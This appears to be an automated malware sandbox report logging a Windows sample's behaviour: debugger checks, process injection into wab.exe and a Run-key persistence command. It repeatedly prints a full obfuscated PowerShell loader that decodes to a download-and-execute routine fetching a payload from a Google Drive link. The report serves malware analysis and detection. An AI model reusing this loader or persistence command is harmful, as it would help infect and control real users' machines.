Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_00A77ED0 CheckRemoteDebuggerPresent, 9_2_00A77ED0
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_02CDD6CC LdrInitializeThunk,LdrInitializeThunk, 7_2_02CDD6CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4050000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: A7FB28 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l Yletimock Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prehatred.Fid && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l Yletimock Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prehatred.Fid && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Andelsbevaegelsen" /t REG_EXPAND_SZ /d "%Before110% -w 1 $Tohndig=(Get-ItemProperty -Path 'HKCU:\Dirigent\').skemaformernes;%Before110% ($Tohndig)" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Andelsbevaegelsen" /t REG_EXPAND_SZ /d "%Before110% -w 1 $Tohndig=(Get-ItemProperty -Path 'HKCU:\Dirigent\').skemaformernes;%Before110% ($Tohndig)" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$riffelgange = 1;$authorish='substrin';$authorish+='g';function shockhead($kaputt){$spisefrikvarterernes=$kaputt.length-$riffelgange;for($ratihabumr=5; $ratihabumr -lt $spisefrikvarterernes; $ratihabumr+=(6)){$udsagnsleddenes+=$kaputt.$authorish.invoke($ratihabumr, $riffelgange);}$udsagnsleddenes;}function sabotage($velal){& ($tanquelinian) ($velal);}$greenheart=shockhead 'outramindowoaigrezbestoiskspolmusikl ,utsa brne/gr.nd5.itin.afdel0up,ai zw ng(synapwnjereicoresnd,agsdtosdeoherrgwkroe sbil,e .runenstraftpraec forma1myoli0the,m. bort0opfi,;enkel arch,wirradiobsern kyst6.odra4banju; eval for axudban6czare4spat ;under tayerrund,iv tred:m.ckb1jacqu2maime1 seri.deesk0allop) brad beregghemodesalewc diskkrandmovolit/ qu z2 kruk0fo.nu1ordfo0 enio0,anlo1jetst0invas1gaska knif.fs criirgerirgillyestridf toitovexdex.nnek/gener1orke.2minst1bo.it. ,eha0dia,o ';$feline=shockhead 'stripuoverts poliegalehrosobe-foraaaskinkgomgiveenwinnsanc tjinri ';$ostler=shockhead 'goo,whkvikkt nikot ousp udstsnemme:ha dw/tjles/gorvadantiprchivei sie.vkontredansk.fellygprivaop eezoviolig b,dflampeleo var.isospcsubtromowbumjacke/tilbau victcopsge?ribboeturp.xi,prgptelevohofchrhavait pakk= nurtdbearlotrevewputnanfu,ill.resuoextena spirdse vi& sundihistodmanja= allo1frugthenchej estynymphvnucl gappasaa ninv u.pebpoachpugtetjjol,e7 .eww5lob.tw typhnendomnanalyyharmem aliqhadvenv al ypturnuqgenerdkropskny.tie.nobs9 windk beuntmon sfapolozdisozpsnesksafvaekinte ';$olympier=shockhead 'det r>r dio ';$tanquelinian=shockhead 'succei,nackefascixciv l ';$aminobenzamide = shockhead 'preloeforcec filihguelponone. b cki%b,ahmainterpinserpbrunldud rmaand.lt karbaaquar% bri.\ kattpblodrrindhoe monahnav,ea,egiststr,irmocame b lldafsky.unc.vfdomsfijav.ldrevi oc.i&stnne&chrys skrine overchendehmelleodm,ni tritu$ sept ';sabotage (shockhead 'bigba$storhg r,tiltrim ounadvb dissasamm.lcr,nk: cecoaforemaki,kenunfledsportepsychltoledybramsdtan eenrga nsmaafs exce=rotte(t.skncb dummvalerddelib demat/inaudcbiogr fa el$wretcanormam forsienneanmidnio colebunexteklonen undsz skumabevilmtvrf i destdflexueb,lim)adnot ');sabotage (shockhead 'form.$wienegpal.nlalleyoballobenedia blgelstyre:expouuschoon,mbets engahlydliu hel.nk.tukn.kraleun.erdalcoh=overf$,iuroonaticsk,loltdimpll s,miedann rforgl.oplgns ominp dubblafgrsigangat alsr(u orb$musheogl.cilordney nordmteorip iploi,ympae heltrbeta )fresn ');$ostler=$unshunned[0];sabotage (shockhead 'super$ups agheterlpal.to smelb br.aaparanl mikr:sloucmhasarewhalesfrdigspentaa gen.nevitisvirag=radionaitche g,unwpeete-prea,odykkeb ma sj.verbeh kkecanl,st phy. udbars,eceny,emuns fiprtmelame klipmalkef..vnbyn urokesaltatendur.samarwstavneap,erbdikotcunderl trokiinj restudenstrimtdowse ');sabotage (shockhead 'rigni$a ticmejende be nslichestraneatono,nggesnsgerma.,etalhw.nonethereabeford emme strorphi.os klo,[joint$biskufforbieshor.l yletimock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$riffelgange = 1;$authorish='substrin';$authorish+='g';function shockhead($kaputt){$spisefrikvarterernes=$kaputt.length-$riffelgange;for($ratihabumr=5; $ratihabumr -lt $spisefrikvarterernes; $ratihabumr+=(6)){$udsagnsleddenes+=$kaputt.$authorish.invoke($ratihabumr, $riffelgange);}$udsagnsleddenes;}function sabotage($velal){& ($tanquelinian) ($velal);}$greenheart=shockhead 'outramindowoaigrezbestoiskspolmusikl ,utsa brne/gr.nd5.itin.afdel0up,ai zw ng(synapwnjereicoresnd,agsdtosdeoherrgwkroe sbil,e .runenstraftpraec forma1myoli0the,m. bort0opfi,;enkel arch,wirradiobsern kyst6.odra4banju; eval for axudban6czare4spat ;under tayerrund,iv tred:m.ckb1jacqu2maime1 seri.deesk0allop) brad beregghemodesalewc diskkrandmovolit/ qu z2 kruk0fo.nu1ordfo0 enio0,anlo1jetst0invas1gaska knif.fs criirgerirgillyestridf toitovexdex.nnek/gener1orke.2minst1bo.it. ,eha0dia,o ';$feline=shockhead 'stripuoverts poliegalehrosobe-foraaaskinkgomgiveenwinnsanc tjinri ';$ostler=shockhead 'goo,whkvikkt nikot ousp udstsnemme:ha dw/tjles/gorvadantiprchivei sie.vkontredansk.fellygprivaop eezoviolig b,dflampeleo var.isospcsubtromowbumjacke/tilbau victcopsge?ribboeturp.xi,prgptelevohofchrhavait pakk= nurtdbearlotrevewputnanfu,ill.resuoextena spirdse vi& sundihistodmanja= allo1frugthenchej estynymphvnucl gappasaa ninv u.pebpoachpugtetjjol,e7 .eww5lob.tw typhnendomnanalyyharmem aliqhadvenv al ypturnuqgenerdkropskny.tie.nobs9 windk beuntmon sfapolozdisozpsnesksafvaekinte ';$olympier=shockhead 'det r>r dio ';$tanquelinian=shockhead 'succei,nackefascixciv l ';$aminobenzamide = shockhead 'preloeforcec filihguelponone. b cki%b,ahmainterpinserpbrunldud rmaand.lt karbaaquar% bri.\ kattpblodrrindhoe monahnav,ea,egiststr,irmocame b lldafsky.unc.vfdomsfijav.ldrevi oc.i&stnne&chrys skrine overchendehmelleodm,ni tritu$ sept ';sabotage (shockhead 'bigba$storhg r,tiltrim ounadvb dissasamm.lcr,nk: cecoaforemaki,kenunfledsportepsychltoledybramsdtan eenrga nsmaafs exce=rotte(t.skncb dummvalerddelib demat/inaudcbiogr fa el$wretcanormam forsienneanmidnio colebunexteklonen undsz skumabevilmtvrf i destdflexueb,lim)adnot ');sabotage (shockhead 'form.$wienegpal.nlalleyoballobenedia blgelstyre:expouuschoon,mbets engahlydliu hel.nk.tukn.kraleun.erdalcoh=overf$,iuroonaticsk,loltdimpll s,miedann rforgl.oplgns ominp dubblafgrsigangat alsr(u orb$musheogl.cilordney nordmteorip iploi,ympae heltrbeta )fresn ');$ostler=$unshunned[0];sabotage (shockhead 'super$ups agheterlpal.to smelb br.aaparanl mikr:sloucmhasarewhalesfrdigspentaa gen.nevitisvirag=radionaitche g,unwpeete-prea,odykkeb ma sj.verbeh kkecanl,st phy. udbars,eceny,emuns fiprtmelame klipmalkef..vnbyn urokesaltatendur.samarwstavneap,erbdikotcunderl trokiinj restudenstrimtdowse ');sabotage (shockhead 'rigni$a ticmejende be nslichestraneatono,nggesnsgerma.,etalhw.nonethereabeford emme strorphi.os klo,[joint$biskufforbieshor.l yletimock
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$riffelgange = 1;$authorish='substrin';$authorish+='g';function shockhead($kaputt){$spisefrikvarterernes=$kaputt.length-$riffelgange;for($ratihabumr=5; $ratihabumr -lt $spisefrikvarterernes; $ratihabumr+=(6)){$udsagnsleddenes+=$kaputt.$authorish.invoke($ratihabumr, $riffelgange);}$udsagnsleddenes;}function sabotage($velal){& ($tanquelinian) ($velal);}$greenheart=shockhead 'outramindowoaigrezbestoiskspolmusikl ,utsa brne/gr.nd5.itin.afdel0up,ai zw ng(synapwnjereicoresnd,agsdtosdeoherrgwkroe sbil,e .runenstraftpraec forma1myoli0the,m. bort0opfi,;enkel arch,wirradiobsern kyst6.odra4banju; eval for axudban6czare4spat ;under tayerrund,iv tred:m.ckb1jacqu2maime1 seri.deesk0allop) brad beregghemodesalewc diskkrandmovolit/ qu z2 kruk0fo.nu1ordfo0 enio0,anlo1jetst0invas1gaska knif.fs criirgerirgillyestridf toitovexdex.nnek/gener1orke.2minst1bo.it. ,eha0dia,o ';$feline=shockhead 'stripuoverts poliegalehrosobe-foraaaskinkgomgiveenwinnsanc tjinri ';$ostler=shockhead 'goo,whkvikkt nikot ousp udstsnemme:ha dw/tjles/gorvadantiprchivei sie.vkontredansk.fellygprivaop eezoviolig b,dflampeleo var.isospcsubtromowbumjacke/tilbau victcopsge?ribboeturp.xi,prgptelevohofchrhavait pakk= nurtdbearlotrevewputnanfu,ill.resuoextena spirdse vi& sundihistodmanja= allo1frugthenchej estynymphvnucl gappasaa ninv u.pebpoachpugtetjjol,e7 .eww5lob.tw typhnendomnanalyyharmem aliqhadvenv al ypturnuqgenerdkropskny.tie.nobs9 windk beuntmon sfapolozdisozpsnesksafvaekinte ';$olympier=shockhead 'det r>r dio ';$tanquelinian=shockhead 'succei,nackefascixciv l ';$aminobenzamide = shockhead 'preloeforcec filihguelponone. b cki%b,ahmainterpinserpbrunldud rmaand.lt karbaaquar% bri.\ kattpblodrrindhoe monahnav,ea,egiststr,irmocame b lldafsky.unc.vfdomsfijav.ldrevi oc.i&stnne&chrys skrine overchendehmelleodm,ni tritu$ sept ';sabotage (shockhead 'bigba$storhg r,tiltrim ounadvb dissasamm.lcr,nk: cecoaforemaki,kenunfledsportepsychltoledybramsdtan eenrga nsmaafs exce=rotte(t.skncb dummvalerddelib demat/inaudcbiogr fa el$wretcanormam forsienneanmidnio colebunexteklonen undsz skumabevilmtvrf i destdflexueb,lim)adnot ');sabotage (shockhead 'form.$wienegpal.nlalleyoballobenedia blgelstyre:expouuschoon,mbets engahlydliu hel.nk.tukn.kraleun.erdalcoh=overf$,iuroonaticsk,loltdimpll s,miedann rforgl.oplgns ominp dubblafgrsigangat alsr(u orb$musheogl.cilordney nordmteorip iploi,ympae heltrbeta )fresn ');$ostler=$unshunned[0];sabotage (shockhead 'super$ups agheterlpal.to smelb br.aaparanl mikr:sloucmhasarewhalesfrdigspentaa gen.nevitisvirag=radionaitche g,unwpeete-prea,odykkeb ma sj.verbeh kkecanl,st phy. udbars,eceny,emuns fiprtmelame klipmalkef..vnbyn urokesaltatendur.samarwstavneap,erbdikotcunderl trokiinj restudenstrimtdowse ');sabotage (shockhead 'rigni$a ticmejende be nslichestraneatono,nggesnsgerma.,etalhw.nonethereabeford emme strorphi.os klo,[joint$biskufforbieshor.l yletimock Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$riffelgange = 1;$authorish='substrin';$authorish+='g';function shockhead($kaputt){$spisefrikvarterernes=$kaputt.length-$riffelgange;for($ratihabumr=5; $ratihabumr -lt $spisefrikvarterernes; $ratihabumr+=(6)){$udsagnsleddenes+=$kaputt.$authorish.invoke($ratihabumr, $riffelgange);}$udsagnsleddenes;}function sabotage($velal){& ($tanquelinian) ($velal);}$greenheart=shockhead 'outramindowoaigrezbestoiskspolmusikl ,utsa brne/gr.nd5.itin.afdel0up,ai zw ng(synapwnjereicoresnd,agsdtosdeoherrgwkroe sbil,e .runenstraftpraec forma1myoli0the,m. bort0opfi,;enkel arch,wirradiobsern kyst6.odra4banju; eval for axudban6czare4spat ;under tayerrund,iv tred:m.ckb1jacqu2maime1 seri.deesk0allop) brad beregghemodesalewc diskkrandmovolit/ qu z2 kruk0fo.nu1ordfo0 enio0,anlo1jetst0invas1gaska knif.fs criirgerirgillyestridf toitovexdex.nnek/gener1orke.2minst1bo.it. ,eha0dia,o ';$feline=shockhead 'stripuoverts poliegalehrosobe-foraaaskinkgomgiveenwinnsanc tjinri ';$ostler=shockhead 'goo,whkvikkt nikot ousp udstsnemme:ha dw/tjles/gorvadantiprchivei sie.vkontredansk.fellygprivaop eezoviolig b,dflampeleo var.isospcsubtromowbumjacke/tilbau victcopsge?ribboeturp.xi,prgptelevohofchrhavait pakk= nurtdbearlotrevewputnanfu,ill.resuoextena spirdse vi& sundihistodmanja= allo1frugthenchej estynymphvnucl gappasaa ninv u.pebpoachpugtetjjol,e7 .eww5lob.tw typhnendomnanalyyharmem aliqhadvenv al ypturnuqgenerdkropskny.tie.nobs9 windk beuntmon sfapolozdisozpsnesksafvaekinte ';$olympier=shockhead 'det r>r dio ';$tanquelinian=shockhead 'succei,nackefascixciv l ';$aminobenzamide = shockhead 'preloeforcec filihguelponone. b cki%b,ahmainterpinserpbrunldud rmaand.lt karbaaquar% bri.\ kattpblodrrindhoe monahnav,ea,egiststr,irmocame b lldafsky.unc.vfdomsfijav.ldrevi oc.i&stnne&chrys skrine overchendehmelleodm,ni tritu$ sept ';sabotage (shockhead 'bigba$storhg r,tiltrim ounadvb dissasamm.lcr,nk: cecoaforemaki,kenunfledsportepsychltoledybramsdtan eenrga nsmaafs exce=rotte(t.skncb dummvalerddelib demat/inaudcbiogr fa el$wretcanormam forsienneanmidnio colebunexteklonen undsz skumabevilmtvrf i destdflexueb,lim)adnot ');sabotage (shockhead 'form.$wienegpal.nlalleyoballobenedia blgelstyre:expouuschoon,mbets engahlydliu hel.nk.tukn.kraleun.erdalcoh=overf$,iuroonaticsk,loltdimpll s,miedann rforgl.oplgns ominp dubblafgrsigangat alsr(u orb$musheogl.cilordney nordmteorip iploi,ympae heltrbeta )fresn ');$ostler=$unshunned[0];sabotage (shockhead 'super$ups agheterlpal.to smelb br.aaparanl mikr:sloucmhasarewhalesfrdigspentaa gen.nevitisvirag=radionaitche g,unwpeete-prea,odykkeb ma sj.verbeh kkecanl,st phy. udbars,eceny,emuns fiprtmelame klipmalkef..vnbyn urokesaltatendur.samarwstavneap,erbdikotcunderl trokiinj restudenstrimtdowse ');sabotage (shockhead 'rigni$a ticmejende be nslichestraneatono,nggesnsgerma.,etalhw.nonethereabeford emme strorphi.os klo,[joint$biskufforbieshor.l yletimock Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
